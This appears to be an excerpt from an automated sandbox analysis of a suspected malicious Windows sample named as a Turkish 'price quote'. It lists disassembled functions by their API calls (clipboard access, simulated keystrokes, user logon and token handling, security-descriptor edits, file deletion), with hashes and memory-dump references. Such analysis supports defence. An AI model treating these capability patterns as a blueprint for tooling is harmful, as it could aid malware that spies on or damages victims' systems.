ClientToScreen.USER32(?,?), ref: 00A19D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A19D82

Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952

GetWindowLongW.USER32(?,000000F0), ref: 00A19E05

Strings

F, xrefs: 00A19D07
@GUI_DRAGID, xrefs: 00A1997D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
Instruction ID: 635a56c16769344b6ed71c58d50fdace3a9ca0d80c3a3391d71d4e8062b3fb7c
Opcode Fuzzy Hash: b1a4ae149677c09b42da1ed858c3a724e6083d2cd499af01af1ddaf7835b0a93
Instruction Fuzzy Hash: 23427C74204241EFDB25CF68CC54BEBBBE5FF89320F144629F6A9872A1D731A891CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A14873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A148F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A14908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A14927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A1494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A1495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A1497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A149AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A149D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A14A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A14A7E
IsMenu.USER32(?), ref: 00A14A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A14B20
GetWindowLongW.USER32(?,000000F0), ref: 00A14B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A14BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A14C82
wsprintfW.USER32 ref: 00A14CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A14D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A14D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00A14D5A

Strings

%d/%02d/%02d, xrefs: 00A14CA8

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 4c8e8213106ea690ca211cdef74bd83469e8eb1b21b29f848a89ca275fdd7d3c
Instruction ID: 73feb5f7f601119932d2bf4e8647bce16137ed04541997fecf446e79b78533dc
Opcode Fuzzy Hash: 4c8e8213106ea690ca211cdef74bd83469e8eb1b21b29f848a89ca275fdd7d3c
Instruction Fuzzy Hash: 2E12E071640214ABEB248F68CC49FEE7BF9EF89720F144129F515DB2E1DB789982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0099F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0099F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009DF474
IsIconic.USER32(00000000), ref: 009DF47D
ShowWindow.USER32(00000000,00000009), ref: 009DF48A
SetForegroundWindow.USER32(00000000), ref: 009DF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4AA
GetCurrentThreadId.KERNEL32 ref: 009DF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009DF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 009DF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 009DF4DE
SetForegroundWindow.USER32(00000000), ref: 009DF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF4F6
keybd_event.USER32(00000012,00000000), ref: 009DF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF50B
keybd_event.USER32(00000012,00000000), ref: 009DF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF519
keybd_event.USER32(00000012,00000000), ref: 009DF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 009DF528
keybd_event.USER32(00000012,00000000), ref: 009DF52D
SetForegroundWindow.USER32(00000000), ref: 009DF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 009DF557

Strings

Shell_TrayWnd, xrefs: 009DF46F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
Instruction ID: 87072a120f8019b340394eeb7ab2ad16c776586e2d5acfe1f11d60cf25f21b83
Opcode Fuzzy Hash: 7d0bd5185f355bfa0cdd75d60793530c5b41636e7ccba351b9a45cca5eaeffa2
Instruction Fuzzy Hash: 30314371AC0318BBEB21ABF55C4AFBF7E6DEB44B60F108466F601E61D1C6B15D01AA60

Uniqueness

Uniqueness Score: -1.00%

Function 009E1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009E170D
Part of subcall function 009E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009E173A
Part of subcall function 009E16C3: GetLastError.KERNEL32 ref: 009E174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 009E1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009E12A8
CloseHandle.KERNEL32(?), ref: 009E12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009E12D1
GetProcessWindowStation.USER32 ref: 009E12EA
SetProcessWindowStation.USER32(00000000), ref: 009E12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009E1310

Part of subcall function 009E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009E11FC), ref: 009E10D4
Part of subcall function 009E10BF: CloseHandle.KERNEL32(?,?,009E11FC), ref: 009E10E9

Strings

, xrefs: 009E125A
winsta0, xrefs: 009E12CC
default, xrefs: 009E130B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 1678c82d77e7cfabec67159f2a661ab67cb38ce7df3a661138c92c3dd7559727
Instruction ID: dc7e380d2164928b2077dbdd2cffd6d7a48ddbf0759e820b5d25be8f314edba2
Opcode Fuzzy Hash: 1678c82d77e7cfabec67159f2a661ab67cb38ce7df3a661138c92c3dd7559727
Instruction Fuzzy Hash: 69819A72900289ABDF22DFA5DC49FEE7BBDEF48710F148129F910A62A0D7718D45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 009E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
Part of subcall function 009E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
Part of subcall function 009E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
Part of subcall function 009E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
Part of subcall function 009E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009E0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009E0C00
GetLengthSid.ADVAPI32(?), ref: 009E0C17
GetAce.ADVAPI32(?,00000000,?), ref: 009E0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009E0C6D
GetLengthSid.ADVAPI32(?), ref: 009E0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 009E0C8C
HeapAlloc.KERNEL32(00000000), ref: 009E0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009E0CB4
CopySid.ADVAPI32(00000000), ref: 009E0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009E0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009E0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D45
HeapFree.KERNEL32(00000000), ref: 009E0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D55
HeapFree.KERNEL32(00000000), ref: 009E0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0D65
HeapFree.KERNEL32(00000000), ref: 009E0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 009E0D78
HeapFree.KERNEL32(00000000), ref: 009E0D7F

Part of subcall function 009E1193: GetProcessHeap.KERNEL32(00000008,009E0BB1,?,00000000,?,009E0BB1,?), ref: 009E11A1
Part of subcall function 009E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,009E0BB1,?), ref: 009E11A8
Part of subcall function 009E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009E0BB1,?), ref: 009E11B7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
Instruction ID: 8171718909273c41859ab916f21f3dabd8600995fea9b2473e31c55c8b250ad8
Opcode Fuzzy Hash: 4d3d81b213c5290d66130b71e43e8c469ced4a6dc4c80e4873b0e8c7901791cf
Instruction Fuzzy Hash: 1671997290025AABDF11DFE5DC44BEEBBBCBF48310F148215E954A7191D7B4AE82CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00A1CC08), ref: 009FEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 009FEB37
GetClipboardData.USER32(0000000D), ref: 009FEB43
CloseClipboard.USER32 ref: 009FEB4F
GlobalLock.KERNEL32(00000000), ref: 009FEB87
CloseClipboard.USER32 ref: 009FEB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 009FEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 009FEBC9
GetClipboardData.USER32(00000001), ref: 009FEBD1
GlobalLock.KERNEL32(00000000), ref: 009FEBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 009FEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 009FEC38
GetClipboardData.USER32(0000000F), ref: 009FEC44
GlobalLock.KERNEL32(00000000), ref: 009FEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009FEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009FECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 009FECF3
CountClipboardFormats.USER32 ref: 009FED14
CloseClipboard.USER32 ref: 009FED59

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
Instruction ID: 1b1ca7b5c2df06c5254c94f4c96db57b9228eef9b8becc80ed5be88fd14a4a16
Opcode Fuzzy Hash: fad412407564933f58c26ef99709fdf29fdb71fbe68ed1c12ffb9f9e92c77db1
Instruction Fuzzy Hash: CB61CF34244305AFD300EF64D888FBA77A8AF84724F188559F596972B2DB31DD46CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009F69BE
FindClose.KERNEL32(00000000), ref: 009F6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009F6A75

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 009F6ADF

Strings

%4d, xrefs: 009F6BB1
%02d, xrefs: 009F6C00, 009F6C0A, 009F6C5A, 009F6CAA, 009F6CFA, 009F6D4A
%4d%02d%02d%02d%02d%02d, xrefs: 009F6B6A
%03d, xrefs: 009F6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 009F6B32

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
Instruction ID: b5bef4f45f0b1e4ec6d40a323e403090bef8cdcf6a9ea0e955b8f60599955686
Opcode Fuzzy Hash: 9a7995fd0c021e7a62df787a374a4fa0acefc4ff342b0310c690542db927788e
Instruction Fuzzy Hash: 0CD14EB2508304AEC710EFA4D991EBBB7ECAF98704F04491DF589D6291EB74DA44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009F9663
GetFileAttributesW.KERNEL32(?), ref: 009F96A1
SetFileAttributesW.KERNEL32(?,?), ref: 009F96BB
FindNextFileW.KERNEL32(00000000,?), ref: 009F96D3
FindClose.KERNEL32(00000000), ref: 009F96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009F96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 009F974A
SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 009F9772
FindClose.KERNEL32(00000000), ref: 009F977F
FindClose.KERNEL32(00000000), ref: 009F978F

Strings

*.*, xrefs: 009F96F5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
Instruction ID: d2afa46118386d5842fdfad62bb90abccaf32f258c4cab3bc2abbc651f8fc8d8
Opcode Fuzzy Hash: 47fac364245d4efe0eb7c2b3e2067b468dfa7bd9c431db4124b85a9ef9b31269
Instruction Fuzzy Hash: 6531BE3668061D7BDB10EFB4DC08BEE77ACAF49331F108556FA25E20A0EB34DA458B54

Uniqueness

Uniqueness Score: -1.00%

Function 009F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009F97BE
FindNextFileW.KERNEL32(00000000,?), ref: 009F9819
FindClose.KERNEL32(00000000), ref: 009F9824
FindFirstFileW.KERNEL32(*.*,?), ref: 009F9840
SetCurrentDirectoryW.KERNEL32(?), ref: 009F9890
SetCurrentDirectoryW.KERNEL32(00A46B7C), ref: 009F98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009F98B8
FindClose.KERNEL32(00000000), ref: 009F98C5
FindClose.KERNEL32(00000000), ref: 009F98D5

Part of subcall function 009EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009EDB00

Strings

*.*, xrefs: 009F983B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
Instruction ID: 5a013c9048e4385c520651e864208206b83a1f58efba9c0c15ea1501c0c44cb4
Opcode Fuzzy Hash: 52767a259a0767fb04b03579b77a9e7a262fd1c21e4e670a0c7570d5be5a564e
Instruction Fuzzy Hash: 9331923554061D7ADB10EFA4DC48BEE77ACAF46370F148555E924A2190DB70DE858B60

Uniqueness

Uniqueness Score: -1.00%

Function 009F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009F8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009F8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F8310
SetCurrentDirectoryW.KERNEL32(?), ref: 009F8324
SetCurrentDirectoryW.KERNEL32(?), ref: 009F8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F838C
SetCurrentDirectoryW.KERNEL32(?), ref: 009F8395

Strings

*.*, xrefs: 009F839B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
Instruction ID: 61f850be3772329072a25edf183e4a1bf34625926c398fdaaf2e10422500f0db
Opcode Fuzzy Hash: 761b1e5316684d30f62eea72f55c2fbe523b6eb04a601e46fb821829132a9c68
Instruction Fuzzy Hash: EE615BB25083499FCB10EF64C840AAFB3E8FF89714F04891DFA9997251DB35E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2

Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A

FindFirstFileW.KERNEL32(?,?), ref: 009ED122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009ED1DD
MoveFileW.KERNEL32(?,?), ref: 009ED1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 009ED20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 009ED237

Part of subcall function 009ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009ED21C,?,?), ref: 009ED2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 009ED253
FindClose.KERNEL32(00000000), ref: 009ED264

Strings

\*.*, xrefs: 009ED0CD, 009ED0D6, 009ED0EB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
Instruction ID: fc0d859c3f5596cbc192058b0d86b6fba74b47f2284761bb74bc4d88b1be8e2a
Opcode Fuzzy Hash: d7d0c16dbc88b81ed00f1bd9278975e57200ca03eb13b82241ca5eb4563665be
Instruction Fuzzy Hash: 97613B3180614DABCF06FBE1CA52AFDB779AF95300F248165E41277291EB35AF09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009FED91
EmptyClipboard.USER32 ref: 009FED97
GlobalAlloc.KERNEL32(00000002,?), ref: 009FEDAC
CloseClipboard.USER32 ref: 009FEEA3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2b6bca281e77385d0d50c35265b66065e401f8e3a6389816bd7944d975d99326
